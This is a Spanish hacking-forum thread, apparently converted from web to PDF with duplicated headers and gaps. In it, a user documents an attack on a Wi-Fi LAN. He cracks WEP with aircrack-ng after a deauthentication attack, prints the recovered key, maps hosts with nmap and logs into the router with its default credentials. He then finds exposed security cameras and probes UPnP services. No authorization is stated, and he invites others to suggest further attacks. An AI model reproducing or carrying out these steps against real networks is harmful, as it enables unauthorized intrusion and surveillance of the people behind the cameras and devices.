pdfcrowd.com open in browser PRO version Are you a developer? Try out the HTML to PDF API Noticias: Normativa del foro: +inf o Hack x Crack - Comunidad de Seguridad informática » Seguridad Informatica » Hacking » Diario de un Ataque IMPRIMIR Páginas: [1] 2 3 4 5 6 7 8 Ir Abajo Diario de un Ataque « en: Junio 21, 2012, 02:47:28 pm » odeveku Parte de la comunidad [L3] Mensajes: 197 PRÓLOGO En vista a las respuestas obtenidas en este hilo http://foro.hackxcrack.net/forum/index.php?topic=12351.0 se crea este post en el que se va a analizar y diseccionar un ataque en tiempo real a una red LAN. La idea es que toda la comunidad participe en el ataque aportando sus ideas, conocimientos y métodos para lograr primero comprender y luego comprometer la seguridad de la red. Yo pondré en práctica cada método que propongáis y postearé el resultado con Autor Tema: Diario de un Ataque (Leído 28325 veces) Inicio Buscar Ingresar Registrarse
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
Noticias:Normativa del foro: +info
Hack x Crack - Comunidad de Seguridad informática » Seguridad Informatica » Hacking » Diario de un Ataque
IMPRIMIRPáginas: [1] 2 3 4 5 6 7 8 Ir Abajo
Diario de un Ataque« en: Junio 21, 2012, 02:47:28 pm »
odevekuParte de la comunidad [L3]
Mensajes: 197
PRÓLOGO
En vista a las respuestas obtenidas en este hilohttp://foro.hackxcrack.net/forum/index.php?topic=12351.0 se crea estepost en el que se va a analizar y diseccionar un ataque en tiempo real auna red LAN. La idea es que toda la comunidad participe en el ataqueaportando sus ideas, conocimientos y métodos para lograr primerocomprender y luego comprometer la seguridad de la red. Yo pondré enpráctica cada método que propongáis y postearé el resultado con
Autor Tema: Diario de un Ataque (Leído 28325 veces)
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
capturas de pantalla etc. El objetivo es documentar y analizar enprofundidad el ataque y los métodos empleados en él para que todospodamos beneficiarnos y aprender de ello. Al lío!
ENTRANDO EN LA RED
Sabemos que la red LAN que queremos atacar dispone de un router Wi-Fi con ESSID: WLAN_BE. Este es el único dato que tenemos por ahora, por lo que centramosnuestro ataque en el AP de la red Wi-Fi con el objetivo deautentificarnos como clientes legítimos de la red.
Corremos Backtrack.
Comenzamos con un monitoreo general de las redes a nuestro alcancepara localizar nuestro objetivo. Descubrimos que el AP está emitiendo enel canal 6 y que su dirección MAC es E0:90:53:4A:68:AA. Ademásaveriguamos que la contraseña tiene una encriptación WEP.Código: [Seleccionar]
airodump-ng wlan0
Monitoreamos el tráfico de la red para capturar IVs que nos permitancrackear la pass con aircrack-ng.Código: [Seleccionar]
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
una petición de ARP para poder reinyectarlos. Al reinyectarlosprovocamos que el AP tenga que emitir otro paquete ARP con un IVnuevo que capturamos con el airodump-ng. Este proceso es un bucleque se repite generando muchisimo tráfico.Código: [Seleccionar]
Como no encontramos ningún paquete de ARP que reinyectar, lanzamosun ataque de desautenticación a un cliente legítimo para que al volver aautenticarse genere una petición de ARP que podamos capturar yreinyectar.Código: [Seleccionar]
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0
Crackeamos el password de la red mediante los IVs obtenidos quehemos guardado en el wlan_be.cap.Código: [Seleccionar]
aircrack-ng wlan_be.cap
Ya tenemos el password de la red: XE091534A27BENos conectamos a ella como si fuéramos uno más.
TANTEANDO EL TERRENO
Una vez que estamos dentro de la red, hacemos un "reconocimiento delterreno" para saber ante que nos encontramos. Para ello vamos arealizar un escaneo con el Nmap.
Primero ejecutamos el comando:Código: [Seleccionar]
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
Esto nos sirve para saber que IP nos ha asignado el servidor DHCP, yasí poder deducir en que rango de IPs nos estamos moviendo.Descubrimos que nuestra IP es 192.168.1.129 , por lo tanto sabemosque seguramente el servidor DHCP asigne las IPs dentro del rango192.168.1.1-255.
Para confirmarlo y hacernos una idea general del mapa de la LANrealizamos un escaneo rápido con Nmap.Código: [Seleccionar]
nmap -sP 192.168.1.1-255
La opción -sP le indica al Nmap que simplemente compruebe si los hostsestan up or down.
Resultado:Código: [Seleccionar]
root@bt:~# nmap -sP 192.168.1.1-255
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST
Nmap scan report for 192.168.1.1
Host is up (0.011s latency).
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
Descubrimos que hay 15 máquinas conectadas mediante la WLAN yconfirmamos nuestras sospechas de que el servidor DHCP asigna IPs enel rango 192.168.1.1-255 . Esto ya nos permite esbozar un mapa más omenos aproximado de la red.
La ip 192.168.1.1 corresponde seguramente al AP, osea al router, queparece ser un Xavii.Vemos un rango de Ips 192.168.1.10-20 que corresponden a aparatosD-Link lo que es bastante llamativo.Vemos otras IPs correspondientes a varios hosts.Y por último vemos nuestra IP 192.168.1.129 que la descartamos delanálisis.
Una vez que tenemos más o menos claro por donde nos movemos...vamos a ver que pasa con ese router.
EL ROUTER
En el escaneo anterior hemos visto que la IP del router era 192.168.1.1.Esta vez vamos a realizar un escaneo más a fondo, buscando puertoabiertos, servicios, S.O... Para ello corremos el Nmap con los siguientesparámetros:Código: [Seleccionar]
root@bt:~# nmap -sV -A 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.0065s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Xavi 7768 WAP ftpd 1.00
23/tcp open telnet Zoom X6 ADSL router telnetd
53/tcp open tcpwrapped
80/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)
2800/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
8008/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Device type: broadband router|WAP
Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded
OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932)
Network Distance: 1 hop
Service Info: Devices: WAP, broadband router
TRACEROUTE
HOP RTT ADDRESS
1 6.45 ms 192.168.1.1
Vemos que entre otras cosas en el campo del ftp el nmap nos dice quese trata del modelo Xavii 7768. Esto es una aproximación y seguramenteno sea totalmente cierto, pero nos sirve.Buscamos la documentación del router Xavii 7768 en internethttp://www.adslayuda.com/xavi7768-cambiar_clave_acceso.html yvemos que el usuario y el password por defecto del router son 1234 y1234 respectivamente. Es muy probable que no los hayan cambiado asíque por probar que no quede.
Efectivamente no lo han cambiado. Ui, parece que alguien se ha dejadola puerta abierta...
Comprobamos que como habíamos supuesto antes no se trata delmodelo Xavii 7768, sino del 7968 plus.Y de repente en la pestaña de redireccionamiento de puertos...
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
BANG! Acabamos de descubrir que eran todos esos aparatos D-Link.Tenemos 9 cámaras con sus correspondientes IPs. Esto empieza aponerse interesante...Además sabemos que alguien se conecta a ellas desde el exterior de lared, ya que no tendría sentido haber configurado un NAT si no vas aacceder desde fuera del router.
Personalmente ODIO las interfaces http de los routers, me parece todouna maraña de opciones y pestañas, así que vamos a conectarnos alrouter por telnet para tener una consola con todas las opcionesordenaditas en blanco sobre negro...
ethernet Commands to configure ethernet transports
firewall Firewall configuration commands
fullConeNat Full Cone NAT configuration commands
help Top level CLI help
igmp igmp configuration commands
imdebug Directly access the information model
ip Configure IP router
lan
logger Log to a remote host using syslog
Vaya... parece que se pueden hacer un par de cosas...Pasemos a las camaras!
CAMARAS
Cuando intentamos acceder a alguna de las camaras por el puertodesignado en la tabla del NAT se abre una ventana como estasolicitandonos un user y una pass.
Al no introducirla correctamente nos redirige a la siguiente pagina:
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
root@bt:~# nmap -sV -A 192.168.1.33
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CEST
Nmap scan report for 192.168.1.33
Host is up (0.0045s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Virata-EmWeb 6.2.1
|_http-title: HP Photosmart Wireless B109n-z
139/tcp open tcpwrapped
445/tcp open netbios-ssn
6839/tcp open tcpwrapped
7435/tcp open tcpwrapped
8080/tcp open http-proxy?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
9100/tcp open jetdirect?
9101/tcp open jetdirect?
9102/tcp open jetdirect?
9110/tcp open unknown
9220/tcp open hp-gsg HP Generic Scan Gateway 1.0
9290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway
9500/tcp open ismserver?
MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)
Device type: printer
Running: HP embedded
OS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-series
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ce
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 486.83 ms 192.168.1.38
Observamos que la MAC del host pertenece a Edimax Technology Co.http://www.edimax.es/es/index.php Basta una búsqueda en internetpara averiguar que es una empresa que se dedica a la fabricación dedispositivos Wireless, entre ellos cámaras Wireless. Será otra cámara?
OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printer
Network Distance: 1 hop
Service Info: Device: router
Los resultados que obtenemos para esta IP son bastante interesantes,ya que según Nmap parace que nos encontramos frente a otro router.Esto rompería los esquemas que nos habíamos hecho en un principio
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
Esto rompería los esquemas que nos habíamos hecho en un principiosobre la composición de la red.
ETHERAPE
Para entender mejor como funciona la red y que hosts se comunicanentre sí ejecutamos el Etherape.Etherape es un programa que básicamente sirve para mapear elrecorrido que siguen las comunicaciones en la red para así poderhacernos una idea de la estructura de la misma.
Esto es lo que obtenemos tras un rato ejecutando etherape:
Como se puede ver parece que la IP 239.255.255.250 se comunicaconstantemente con las IPs de las camaras de seguridad. Esto llama laatención, primero porque en nuestro primer escaneo con Nmap nohabíamos detectado ese host, lo que hace pensar que se trata de unhost externo a la red (más adelante veremos que esto no es así).Ejecutamos Nmap para intentar escanearlo.
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
root@bt:~# nmap 239.255.255.250
Starting Nmap 5.61TEST4
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds
Efectivamente nos da como resultado host down.Probamos con algo diferente, vamos a realizar un ping a la IP mientrascorremos el Etherape para mapear el recorrido de los paquetes.
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
IP 239.255.255.250 MULTIDIFUSIÓN UPnP
Como podemos ver, nosotros estamos mandando paquetes solamente ala IP 239.255.255.250 pero recibimos paquetes de respuesta de las IPs192.168.1.1 192.168.1.13 192.168.1.14 192.168.1.15 . Esto significaque la IP 239.255.255.250 reenvía nuestros "paquetes de ping" a esasIPs, como puede verse en el mapeado de Etherape. Otro datointeresante es que en algunos paquetes aparece "DUP!", esto quieredecir que el paquete está duplicado, lo que nos indica que nos lleganvarias respuestas iguales desde diferentes direcciones, osea, que el
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
paquete que les llega a todos los hosts es el mismo paquete quenosotros envíamos a 239.255.255.250, por eso nos llegan respuestasrepetidas.
Si investigamos un poco en internet http://sanmaikelnews.comze.com/?p=66, descubrimos que la ip 239.255.255.250 es una dirección demultidifusión utilizada por el protocolo UPnP. Los dispositivos queofrecen servicios UPnP envian periódicamente NOTIFICACIONES SSDPal 239.255.255.250:1900, anunciandose a los clientes que estánescuchando. Una NOTIFICACION SSDP contiene una cabecera de‘Localización’ donde especifica la ubicación de un archivo XML. Estearchivo XML contiene datos que indican, entre otras cosas, el tipo (s) dedispositivo UPnP y los servicios soportados por el host, así como rutasadicionales a otros documentos XML que describen los diversosservicios en detalle. Del mismo modo, los clientes UPnP pueden enviarrequerimientos SSDP M-SEARCH al 239.255.255.250:1900 para ver sialguno de los dispositivos UPnP responde.
MIRANDA
Auditar dispositivos UPnP de manera manual es un proceso que requieremucho tiempo y dedicación. Miranda es un script escrito en python quenos permite automatizar y acelerar considerablemente todo esteproceso.
Su localización en la suite de backtrack es:Código: [Seleccionar]
/pentest/enumeration/miranda
Corremos el script miranda.py
Lo primero que necesitamos es encontrar los hosts UPnP que existen ennuestra red:
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
En línea
DaVid...
Re:Diario de un Ataque« Respuesta #2 en: Junio 21, 2012,
07:56:42 pm »
« Última modificación: Junio 21, 2012, 07:59:00 pm por odeveku »
odevekuParte de la comunidad [L3]
Mensajes: 197Sí, la hay. http://bit.ly/LjhPpsDe todas formas, si quieres preguntar algo que no tiene nada que vercon mi post, lo mejor es crear un post nuevo.
En línea
Todo hombre sabio temetres cosas: la tormenta en el mar, la noche
sin luna y la ira de un hombre amable.
Re:Diario de un Ataque« Respuesta #3 en: Junio 21, 2012,
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
Re:Diario de un Ataque« Respuesta #5 en: Junio 21, 2012,
08:59:24 pm »
miyamoto340Visitante
Muy buen aporte, esperaré a ver como sigues xD
En línea
Re:Diario de un Ataque« Respuesta #6 en: Junio 21, 2012,
09:15:45 pm »
ACKÉste es mi foro! [L6]
Mensajes: 1603
La piratería es un crimen. Noataque barcos.
Excelente trabajo! Esto se pone interesante muajaja
Saludos familia
En línea
El guerrero de la luz a veces actúa como el agua, yfuye entre los obstáculos que encuentra. En ciertosmomentos, resistir signifca ser destruido; entonces,él se adapta a las circunstancias.En esto reside la fuerza del agua. Jamás puede serquebrada por un martillo, ni herida por un cuchillo. Lamás poderosa espada del mundo es incapaz de dejar unacicatriz sobre su superfcie. Paulo Coelho
Re:Diario de un Ataque« Respuesta #7 en: Junio 21, 2012,
09:37:23 pm »D16174L_MURD3RLadrón de espacio en la BD [L0]
Mensajes: 8
Muy interesante el post!, ya hacía tiempo que no entraba al foro.Saludos!.
pdfcrowd.comopen in browser PRO version Are you a developer? Try out the HTML to PDF API
En línea
"...And the machines will the take control"
Re:Diario de un Ataque« Respuesta #8 en: Junio 21, 2012,
09:46:42 pm »
cocoÉste es mi foro! [L6]
Mensajes: 1130
la informacion es librebuen trabajo esperemos el desenlase saludos.
En línea
Duérmete niño, duérmete ya…Que viene el Coco y te comerá.
https://www.youtube.com/user/matrixHXC/videos
Re:Diario de un Ataque« Respuesta #9 en: Junio 21, 2012,
10:50:15 pm »
odevekuParte de la comunidad [L3]
Mensajes: 197Bueno brodels, con esto yo creo que podemos dar por concluida la 1ªfase del post. Recordad que el objetivo del post es llevar a cabo unataque conjunto donde toda la comunidad participe. Ya tenemos unescenario más o menos claro. Hay escaneos de todos los hosts conpuertos abiertos, servicios, un mapeado más o menos claro de la red(evidentemente todavía hay que avanzarlo más), hay una lista de todoslos comandos que acepta el router por telnet... Tenéis todo lo necesariopara dejar de relameros los dientes y empezar a pegar bocados, así quea partir de ahora... SE ABRE LA VEDA!!Podéis empezar a plantear ideas, posibles ataques, métodos deescaneo y mapeado alternativos... Podéis pedirme que os proporcioneotros datos en concreto... LO QUE SEA!!!